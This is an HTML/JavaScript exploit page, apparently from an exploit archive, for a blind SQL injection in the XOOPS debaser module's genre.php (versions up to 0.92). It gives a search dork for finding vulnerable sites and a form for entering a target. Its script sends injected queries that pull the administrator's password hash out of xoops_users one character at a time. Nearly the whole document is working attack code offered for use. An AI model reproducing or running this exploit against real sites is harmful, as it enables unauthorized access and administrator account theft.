Xoops Module debaser <= 0.92 (genre.php) BLIND SQL Injection Exploit

<html> <head> <title>XOOPS&nbsp;Module&nbsp;debaser&nbsp;<=&nbsp;0.92(genre.php)&nbsp;BLIND&nbsp;SQL&nbsp;Injection&nbsp;Exploit</title> <script&nbsp;type=\"text/javascript\"> //\'=============================================================================================== //\'[Script&nbsp;Name:&nbsp;XOOPS&nbsp;Module&nbsp;debaser&nbsp;<=&nbsp;0.92(genre.php)&nbsp;BLIND&nbsp;SQL&nbsp;Injection&nbsp;Exploit //\'[Coded&nbsp;by&nbsp;&nbsp;&nbsp;:&nbsp;ajann //\'[Author&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;:&nbsp;ajann //\'[Contact&nbsp;&nbsp;&nbsp;&nbsp;:&nbsp;:( //\'[Dork&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;:&nbsp;inurl:/modules/debaser/ //\'[S.Page&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;:&nbsp;http://www.myxoops.org/ //\'[$$&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;:&nbsp;Free //\'[Using&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;:&nbsp;Write&nbsp;Target&nbsp;after&nbsp;Submit&nbsp;Click //\'=============================================================================================== &nbsp;&nbsp;&nbsp;function&nbsp;nesneyarat()&nbsp;{ &nbsp;var&nbsp;nesne; &nbsp;var&nbsp;tarayici&nbsp;=&nbsp;navigator.appName; &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;if(tarayici&nbsp;==&nbsp;\"Microsoft&nbsp;Internet&nbsp;Explorer\"){ &nbsp;nesne&nbsp;=&nbsp;new&nbsp;ActiveXObject(\"Microsoft.XMLHTTP\"); &nbsp;&nbsp;&nbsp;&nbsp;} &nbsp;&nbsp;else&nbsp;{ &nbsp;nesne&nbsp;=&nbsp;new&nbsp;XMLHttpRequest(); &nbsp;&nbsp;} return&nbsp;nesne; } &nbsp;var&nbsp;http&nbsp;=&nbsp;nesneyarat(); &nbsp;&nbsp;&nbsp;function&nbsp;islemlink(adresyolla,charyolla)&nbsp;{ genreidim=document.getElementById(\'genreid\').value&nbsp;+&nbsp;\"\'\" file=\"/modules/debaser/genre.php?genreid=\"&nbsp;+&nbsp;genreidim pathim=document.getElementById(\'path\').value&nbsp;+&nbsp;file karakterim=document.getElementById(\'karakter\').value&nbsp;+&nbsp;charyolla adres=document.getElementById(\'adresim\').value&nbsp;+&nbsp;pathim&nbsp;+&nbsp;&nbsp;adresyolla&nbsp;+&nbsp;karakterim &nbsp; &nbsp;http.open(\'get\',&nbsp;adres); &nbsp;http.onreadystatechange&nbsp;=&nbsp;cevapFonksiyonu; &nbsp;http.send(null); &nbsp;&nbsp;&nbsp; } &nbsp;&nbsp;&nbsp;function&nbsp;cevapFonksiyonu()&nbsp;{ &nbsp;if(http.readyState&nbsp;==&nbsp;4){ document.getElementById(\'mesaj\').value&nbsp;=&nbsp;http.responseText; yonlendir(); } } function&nbsp;yonlendir()&nbsp;{ &nbsp;&nbsp;if&nbsp;(document.getElementById(\'mesaj\').value.indexOf(\'<td&nbsp;class=\"odd\"&nbsp;colspan=\"2\">\',&nbsp;0)&nbsp;==&nbsp;-1)&nbsp;{ &nbsp;alert(\'False\'); &nbsp;&nbsp;} &nbsp;if&nbsp;(document.getElementById(\'mesaj\').value.indexOf(\'<td&nbsp;class=\"odd\"&nbsp;colspan=\"2\">\',&nbsp;0)&nbsp;!=&nbsp;-1)&nbsp;&nbsp;{ &nbsp;&nbsp;&nbsp;alert(\'TRUEEEEEEE\'); &nbsp;&nbsp;&nbsp;} &nbsp; &nbsp;&nbsp;} function&nbsp;dal()&nbsp;{ if&nbsp;(document.getElementById(\'buton\').value&nbsp;==&nbsp;\"Test&nbsp;Character(0)\")&nbsp;{ &nbsp; &nbsp;document.getElementById(\'buton\').disabled&nbsp;=&nbsp;true; islemlink(\'/**/AND/**/(ascii(substring((SELECT/**/pass/**/FROM/**/xoops_users/**/WHERE/**/uid=1),\',\',1))=48)/*\'); &nbsp;&nbsp;&nbsp;document.getElementById(\'buton\').value&nbsp;=&nbsp;\"Test&nbsp;Character(1)\" &nbsp;setTimeout(\"document.getElementById(\'buton\').disabled&nbsp;=&nbsp;false;\",2000); return&nbsp;false; &nbsp;} if&nbsp;(document.getElementById(\'buton\').value&nbsp;==&nbsp;\"Test&nbsp;Character(1)\")&nbsp;{ &nbsp; &nbsp;document.getElementById(\'buton\').disabled&nbsp;=&nbsp;true; islemlink(\'/**/AND/**/(ascii(substring((SELECT/**/pass/**/FROM/**/xoops_users/**/WHERE/**/uid=1),\',\',1))=49)/*\'); &nbsp;&nbsp;&nbsp;document.getElementById(\'buton\').value&nbsp;=&nbsp;\"Test&nbsp;Character(2)\" &nbsp;setTimeout(\"document.getElementById(\'buton\').disabled&nbsp;=&nbsp;false;\",2000); return&nbsp;false; &nbsp;} if&nbsp;(document.getElementById(\'buton\').value&nbsp;==&nbsp;\"Test&nbsp;Character(2)\")&nbsp;{ &nbsp; &nbsp;document.getElementById(\'buton\').disabled&nbsp;=&nbsp;true; islemlink(\'/**/AND/**/(ascii(substring((SELECT/**/pass/**/FROM/**/xoops_users/**/WHERE/**/uid=1),\',\',1))=50)/*\'); &nbsp;&nbsp;&nbsp;document.getElementById(\'buton\').value&nbsp;=&nbsp;\"Test&nbsp;Character(3)\" &nbsp;setTimeout(\"document.getElementById(\'buton\').disabled&nbsp;=&nbsp;false;\",2000); return&nbsp;false; &nbsp;} if&nbsp;(document.getElementById(\'buton\').value&nbsp;==&nbsp;\"Test&nbsp;Character(3)\")&nbsp;{ &nbsp; &nbsp;document.getElementById(\'buton\').disabled&nbsp;=&nbsp;true; islemlink(\'/**/AND/**/(ascii(substring((SELECT/**/pass/**/FROM/**/xoops_users/**/WHERE/**/uid=1),\',\',1))=51)/*\'); &nbsp;&nbsp;&nbsp;document.getElementById(\'buton\').value&nbsp;=&nbsp;\"Test&nbsp;Character(4)\" &nbsp;setTimeout(\"document.getElementById(\'buton\').disabled&nbsp;=&nbsp;false;\",2000); return&nbsp;false; &nbsp;} if&nbsp;(document.getElementById(\'buton\').value&nbsp;==&nbsp;\"Test&nbsp;Character(4)\")&nbsp;{ &nbsp; &nbsp;document.getElementById(\'buton\').disabled&nbsp;=&nbsp;true; islemlink(\'/**/AND/**/(ascii(substring((SELECT/**/pass/**/FROM/**/xoops_users/**/WHERE/**/uid=1),\',\',1))=52)/*\'); &nbsp;&nbsp;&nbsp;document.getElementById(\'buton\').value&nbsp;=&nbsp;\"Test&nbsp;Character(5)\" &nbsp;setTimeout(\"document.getElementById(\'buton\').disabled&nbsp;=&nbsp;false;\",2000); return&nbsp;false; &nbsp;} if&nbsp;(document.getElementById(\'buton\').value&nbsp;==&nbsp;\"Test&nbsp;Character(5)\")&nbsp;{ &nbsp; &nbsp;document.getElementById(\'buton\').disabled&nbsp;=&nbsp;true; islemlink(\'/**/AND/**/(ascii(substring((SELECT/**/pass/**/FROM/**/xoops_users/**/WHERE/**/uid=1),\',\',1))=53)/*\'); &nbsp;&nbsp;&nbsp;document.getElementById(\'buton\').value&nbsp;=&nbsp;\"Test&nbsp;Character(6)\" &nbsp;setTimeout(\"document.getElementById(\'buton\').disabled&nbsp;=&nbsp;false;\",2000); return&nbsp;false; &nbsp;} if&nbsp;(document.getElementById(\'buton\').value&nbsp;==&nbsp;\"Test&nbsp;Character(6)\")&nbsp;{ &nbsp; &nbsp;document.getElementById(\'buton\').disabled&nbsp;=&nbsp;true; islemlink(\'/**/AND/**/(ascii(substring((SELECT/**/pass/**/FROM/**/xoops_users/**/WHERE/**/uid=1),\',\',1))=54)/*\'); &nbsp;&nbsp;&nbsp;document.getElementById(\'buton\').value&nbsp;=&nbsp;\"Test&nbsp;Character(7)\" &nbsp;setTimeout(\"document.getElementById(\'buton\').disabled&nbsp;=&nbsp;false;\",2000); return&nbsp;false; &nbsp;} if&nbsp;(document.getElementById(\'buton\').value&nbsp;==&nbsp;\"Test&nbsp;Character(7)\")&nbsp;{ &nbsp; &nbsp;document.getElementById(\'buton\').disabled&nbsp;=&nbsp;true; islemlink(\'/**/AND/**/(ascii(substring((SELECT/**/pass/**/FROM/**/xoops_users/**/WHERE/**/uid=1),\',\',1))=55)/*\'); &nbsp;&nbsp;&nbsp;document.getElementById(\'buton\').value&nbsp;=&nbsp;\"Test&nbsp;Character(8)\" &nbsp;setTimeout(\"document.getElementById(\'buton\').disabled&nbsp;=&nbsp;false;\",2000); return&nbsp;false; &nbsp;} if&nbsp;(document.getElementById(\'buton\').value&nbsp;==&nbsp;\"Test&nbsp;Character(8)\")&nbsp;{ &nbsp; &nbsp;document.getElementById(\'buton\').disabled&nbsp;=&nbsp;true; islemlink(\'/**/AND/**/(ascii(substring((SELECT/**/pass/**/FROM/**/xoops_users/**/WHERE/**/uid=1),\',\',1))=56)/*\'); &nbsp;&nbsp;&nbsp;document.getElementById(\'buton\').value&nbsp;=&nbsp;\"Test&nbsp;Character(9)\" &nbsp;setTimeout(\"document.getElementById(\'buton\').disabled&nbsp;=&nbsp;false;\",2000); return&nbsp;false; &nbsp;} if&nbsp;(document.getElementById(\'buton\').value&nbsp;==&nbsp;\"Test&nbsp;Character(9)\")&nbsp;{ &nbsp; &nbsp;document.getElementById(\'buton\').disabled&nbsp;=&nbsp;true; islemlink(\'/**/AND/**/(ascii(substring((SELECT/**/pass/**/FROM/**/xoops_users/**/WHERE/**/uid=1),\',\',1))=57)/*\'); &nbsp;&nbsp;&nbsp;document.getElementById(\'buton\').value&nbsp;=&nbsp;\"Test&nbsp;Character(a)\" &nbsp;setTimeout(\"document.getElementById(\'buton\').disabled&nbsp;=&nbsp;false;\",2000); return&nbsp;false; &nbsp;} if&nbsp;(document.getElementById(\'buton\').value&nbsp;==&nbsp;\"Test&nbsp;Character(a)\")&nbsp;{ &nbsp; &nbsp;document.getElementById(\'buton\').disabled&nbsp;=&nbsp;true; islemlink(\'/**/AND/**/(ascii(substring((SELECT/**/pass/**/FROM/**/xoops_users/**/WHERE/**/uid=1),\',\',1))=97)/*\'); &nbsp;&nbsp;&nbsp;document.getElementById(\'buton\').value&nbsp;=&nbsp;\"Test&nbsp;Character(b)\" &nbsp;setTimeout(\"document.getElementById(\'buton\').disabled&nbsp;=&nbsp;false;\",2000); return&nbsp;false; &nbsp;} if&nbsp;(document.getElementById(\'buton\').value&nbsp;==&nbsp;\"Test&nbsp;Character(b)\")&nbsp;{ &nbsp; &nbsp;document.getElementById(\'buton\').disabled&nbsp;=&nbsp;true; islemlink(\'/**/AND/**/(ascii(substring((SELECT/**/pass/**/FROM/**/xoops_users/**/WHERE/**/uid=1),\',\',1))=98)/*\'); &nbsp;&nbsp;&nbsp;document.getElementById(\'buton\').value&nbsp;=&nbsp;\"Test&nbsp;Character(c)\" &nbsp;setTimeout(\"document.getElementById(\'buton\').disabled&nbsp;=&nbsp;false;\",2000); return&nbsp;false; &nbsp;} if&nbsp;(document.getElementById(\'buton\').value&nbsp;==&nbsp;\"Test&nbsp;Character(c)\")&nbsp;{ &nbsp; &nbsp;document.getElementById(\'buton\').disabled&nbsp;=&nbsp;true; islemlink(\'/**/AND/**/(ascii(substring((SELECT/**/pass/**/FROM/**/xoops_users/**/WHERE/**/uid=1),\',\',1))=99)/*\'); &nbsp;&nbsp;&nbsp;document.getElementById(\'buton\').value&nbsp;=&nbsp;\"Test&nbsp;Character(d)\" &nbsp;setTimeout(\"document.getElementById(\'buton\').disabled&nbsp;=&nbsp;false;\",2000); return&nbsp;false; &nbsp;} if&nbsp;(document.getElementById(\'buton\').value&nbsp;==&nbsp;\"Test&nbsp;Character(d)\")&nbsp;{ &nbsp; &nbsp;document.getElementById(\'buton\').disabled&nbsp;=&nbsp;true; islemlink(\'/**/AND/**/(ascii(substring((SELECT/**/pass/**/FROM/**/xoops_users/**/WHERE/**/uid=1),\',\',1))=100)/*\'); &nbsp;&nbsp;&nbsp;document.getElementById(\'buton\').value&nbsp;=&nbsp;\"Test&nbsp;Character(e)\" &nbsp;setTimeout(\"document.getElementById(\'buton\').disabled&nbsp;=&nbsp;false;\",2000); return&nbsp;false; &nbsp;} if&nbsp;(document.getElementById(\'buton\').value&nbsp;==&nbsp;\"Test&nbsp;Character(e)\")&nbsp;{ &nbsp; &nbsp;document.getElementById(\'buton\').disabled&nbsp;=&nbsp;true; islemlink(\'/**/AND/**/(ascii(substring((SELECT/**/pass/**/FROM/**/xoops_users/**/WHERE/**/uid=1),\',\',1))=101)/*\'); &nbsp;&nbsp;&nbsp;document.getElementById(\'buton\').value&nbsp;=&nbsp;\"Test&nbsp;Character(f)\" &nbsp;setTimeout(\"document.getElementById(\'buton\').disabled&nbsp;=&nbsp;false;\",2000); return&nbsp;false; &nbsp;} if&nbsp;(document.getElementById(\'buton\').value&nbsp;==&nbsp;\"Test&nbsp;Character(f)\")&nbsp;{ &nbsp; &nbsp;document.getElementById(\'buton\').disabled&nbsp;=&nbsp;true; islemlink(\'/**/AND/**/(ascii(substring((SELECT/**/pass/**/FROM/**/xoops_users/**/WHERE/**/uid=1),\',\',1))=102)/*\'); &nbsp;&nbsp;&nbsp;document.getElementById(\'buton\').value&nbsp;=&nbsp;\"Finished\" &nbsp;setTimeout(\"document.getElementById(\'buton\').disabled&nbsp;=&nbsp;false;\",2000); return&nbsp;false; &nbsp;} &nbsp;&nbsp;} </script> &nbsp;&nbsp;&nbsp;</head> &nbsp;<body&nbsp;bgcolor=\"#000000\"> <center> <p><b><font&nbsp;face=\"Verdana\"&nbsp;size=\"2\"&nbsp;color=\"#008000\">XOOPS&nbsp;Module&nbsp;debaser&nbsp;<=&nbsp;0.92(genre.php)&nbsp;BLIND&nbsp;SQL&nbsp;Injection&nbsp;Exploit</font></b></p> <p></p> &nbsp;&nbsp;&nbsp;&nbsp;<b><font&nbsp;face=\"Arial\"&nbsp;size=\"1\"&nbsp;color=\"#FF0000\">Target:</font><font&nbsp;face=\"Arial\"&nbsp;size=\"1\"&nbsp;color=\"#808080\">[http://[target]/</font><font&nbsp;color=\"#00FF00\"&nbsp;size=\"2\"&nbsp;face=\"Arial\"> &nbsp;&nbsp;</font><font&nbsp;color=\"#FF0000\"&nbsp;size=\"2\">&nbsp;</font></b>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;<input&nbsp;type=\"text\"&nbsp;name=\"adresim\"&nbsp;size=\"20\"&nbsp;style=\"background-color:&nbsp;#808000\"&nbsp;onmouseover=\"javascript:this.style.background=\'#808080\';\"&nbsp;onmouseout=\"javascript:this.style.background=\'#808000\';\"&nbsp;value=\"http://\"></p> <br> &nbsp;&nbsp;&nbsp;&nbsp;<b><font&nbsp;face=\"Arial\"&nbsp;size=\"1\"&nbsp;color=\"#FF0000\">&nbsp;Path:</font><font&nbsp;face=\"Arial\"&nbsp;size=\"1\"&nbsp;color=\"#808080\">[http://[target]/[scriptpath]&nbsp;&nbsp;&nbsp;&nbsp;</font></b> &nbsp;&nbsp;<input&nbsp;type=\"text\"&nbsp;name=\"path\"&nbsp;size=\"20\"&nbsp;style=\"background-color:&nbsp;#808000\"&nbsp;onmouseover=\"javascript:this.style.background=\'#808080\';\"&nbsp;onmouseout=\"javascript:this.style.background=\'#808000\';\"&nbsp;value=\"/\"> &nbsp;&nbsp;<p> &nbsp;&nbsp;&nbsp;&nbsp;<b><font&nbsp;face=\"Arial\"&nbsp;size=\"1\"&nbsp;color=\"#FF0000\">&nbsp;Character:</font><font&nbsp;face=\"Arial\"&nbsp;size=\"1\"&nbsp;color=\"#808080\">[Md5&nbsp; &nbsp;&nbsp;Character&nbsp;1-32]&nbsp;&nbsp;&nbsp;</font></b> &nbsp;&nbsp;<input&nbsp;type=\"text\"&nbsp;name=\"karakter\"&nbsp;size=\"20\"&nbsp;style=\"background-color:&nbsp;#808000\"&nbsp;onmouseover=\"javascript:this.style.background=\'#808080\';\"&nbsp;onmouseout=\"javascript:this.style.background=\'#808000\';\"&nbsp;value=\"1\"> </p> &nbsp;&nbsp;<p> &nbsp;&nbsp;&nbsp;&nbsp;<b><font&nbsp;face=\"Arial\"&nbsp;size=\"1\"&nbsp;color=\"#FF0000\">Genre&nbsp;Id:</font><font&nbsp;face=\"Arial\"&nbsp;size=\"1\"&nbsp;color=\"#808080\">[genre.php?genreid=]&nbsp;&nbsp;&nbsp;</font></b> &nbsp;&nbsp;<input&nbsp;type=\"text\"&nbsp;name=\"genreid\"&nbsp;size=\"20\"&nbsp;style=\"background-color:&nbsp;#808000\"&nbsp;onmouseover=\"javascript:this.style.background=\'#808080\';\"&nbsp;onmouseout=\"javascript:this.style.background=\'#808000\';\"&nbsp;value=\"1\"> </p> &nbsp;&nbsp;<p><input&nbsp;type=\"submit\"&nbsp;value=\"Test&nbsp;Character(0)\"&nbsp;name=\"buton\"&nbsp;onclick=\"dal();\"></p> <br> <textarea&nbsp;name=\"mesaj\"&nbsp;rows=\"1\"&nbsp;cols=\"20\"&nbsp;style=\"visibility:hidden\"></textarea>&nbsp;<br> <p> <b><font&nbsp;face=\"Verdana\"&nbsp;size=\"2\"&nbsp;color=\"#008000\">ajann</font></b></p> </p> </center> &nbsp;</body> &nbsp;</html> &nbsp;